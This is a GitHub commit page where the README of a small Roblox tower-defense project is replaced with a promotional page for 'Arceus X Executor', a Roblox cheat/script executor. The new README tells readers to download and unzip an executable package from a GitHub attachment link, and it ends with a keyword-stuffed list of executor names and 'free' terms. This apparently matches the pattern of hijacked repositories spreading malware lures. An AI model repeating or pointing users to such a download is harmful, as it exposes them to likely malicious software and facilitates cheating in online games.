Skip to content

Commit

Permalink
Commit
Browse files Browse the repository at this point in the history
  • Loading branch information
Romeo12243563 committed Sep 2, 2024
1 parent fba8348 commit 685c30d
Showing 1 changed file with 82 additions and 53 deletions.
135 changes: 82 additions & 53 deletions README.md
Original file line number Diff line number Diff line change
@@ -1,53 +1,82 @@
# CWTD
*Simple roblox Tower Defense game*

### to do list:
> * [x] Enemy movement
> * [x] Wave system
> * [x] Different enemy types
> * [x] Simple tower
> * [x] Damaging and killing enemies
> * [x] Mouse raycasting, tower placement
> * [x] Money system
> * [x] Tower upgrade, priority, sell system
> * [x] Mobile support
> * [x] Animating GUI
> * [x] Announcements if cannot afford upgrade
> * [x] Add money income announcement
> * [x] Sound effects for 'red' announcements
> * [x] Improving enemy GUI (Health bar, Type info)
> * [x] Fix enemy health bar position
> * [x] Fix wrong owner displaying
> * [x] Fix tower attack animation and the projectile
> * [x] Make the projectiles faster
> * [x] Change tower limit system
> * [x] Add hitbox around a tower, animated circle
> * [x] Make working damage counter
> * [x] Add tower's damage and kill counter
> * [x] Add number formating
> * [x] Fix tower sell price
> * [x] Fix tower attacking instantly after upgrade
> * [x] Make a starting cash bonus for people that joined the group
> * [x] Create lobby
> * [x] Add gui in lobby
> * [x] Add unit inventory system in lobby
> * [ ] Add item inventory system in lobby
> * [ ] Add summoning system
> * [ ] Code the settings button in lobby
> * [ ] Add story mode system
> * [ ] Add infinity mode system
> * [ ] Create more maps
> * [ ] Make working reward system after game
> * [ ] Add a scrap shop in lobby
> * [ ] Code Next, Retry and Exit buttons on the EndScreen
> * [ ] Create enemies models
> * [ ] Create more towers
> * [ ] Add damage indicator
> * [ ] Add different AOE type attack mechanics with decal
> * [ ] Add different DOT type attack mechanics (Bleed, Freeze, Stun, Slow)
> * [ ] Add lobby rewards system (aka Battlepass)
> * [ ] Add lobby level system
> * [ ] Add quests system
> * [ ] Add batallion mechanics
> * [ ] Add evolve system
> * [ ] Add some Gamepasses
# Arceus X Executor

![Arceus X Executor Logo](https://github.com/user-attachments/files/16788731/arceus_executor_logo.png)

Arceus X Executor is a powerful script execution tool designed specifically for Roblox on Windows. This tool is highly acclaimed within the Roblox community for its exceptional performance when it comes to running custom scripts, unlocking advanced game features, and enabling unparalleled game modifications. With Arceus X Executor, the Roblox experience is revolutionized, offering users a new level of control and customization.

---

## Table of Contents

- [Features](#features)
- [Installation](#installation)
- [Usage](#usage)
- [Contributing](#contributing)
- [License](#license)

---

## Features

1. **Script Execution**: Arceus X Executor allows users to effortlessly run custom scripts within Roblox games, giving them the ability to enhance gameplay and explore new possibilities.

2. **Advanced Game Features**: Unlock a range of advanced game features that were previously inaccessible, providing a unique and enriched gaming experience.

3. **Game Modifications**: Customize and modify Roblox games in ways that were once unimaginable, allowing for endless creativity and innovation.

4. **Windows Compatibility**: Developed specifically for Windows operating systems, ensuring seamless performance and integration with the Roblox platform.

---

## Installation

To install Arceus X Executor, follow these simple steps:

1. Click on the following link to download the installation package: ![Download Arceus X Executor](https://img.shields.io/badge/Download%20Arceus%20X%20Executor-Download-blue)
- Link: [Arceus X Executor Download](https://github.com/user-attachments/files/16788731/ArceusX.zip)

2. Once the download is complete, unzip the package to your desired location on your Windows system.

3. Launch Arceus X Executor and start exploring the vast array of features and functionalities it has to offer.

---

## Usage

### Running Custom Scripts
```lua
-- Example Lua script for executing custom code within Roblox
game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = 50
```

### Unlocking Advanced Features
1. Navigate to the game settings menu.
2. Locate the "Advanced Features" tab and enable the desired options.
3. Enjoy enhanced gameplay with the unlocked features.

### Modifying Games
```lua
-- Example Lua script for modifying a Roblox game
game.Workspace.Gravity = 500
```

---

## Contributing

We welcome contributions from the Roblox community to further enhance and expand the capabilities of Arceus X Executor. If you have ideas, suggestions, or code improvements, feel free to submit a pull request or open an issue on our GitHub repository.

### Repository Topics
"roblox-synapse roblox-synapsex roblox-synapsex-free roblox-electron roblox-electron-free roblox-electron-v3 roblox-aurora roblox-solara roblox-executer roblox-executer-solara-free roblox-executer-solara roblox-solara-free roblox-solara-key roblox-solara-download roblox-aurora-menu roblox-aurora-script roblox-aurora-free roblox-electron-script executors-for-roblox"

---

## License

Arceus X Executor is licensed under the MIT License. See [LICENSE](https://github.com/Arceus-Executor/LICENSE) for more information.

---

Thank you for using Arceus X Executor and being a part of the Roblox community! 🚀🎮

![Roblox Community](https://github.com/user-attachments/files/16788731/roblox_community.png)

0 comments on commit 685c30d

Please sign in to comment.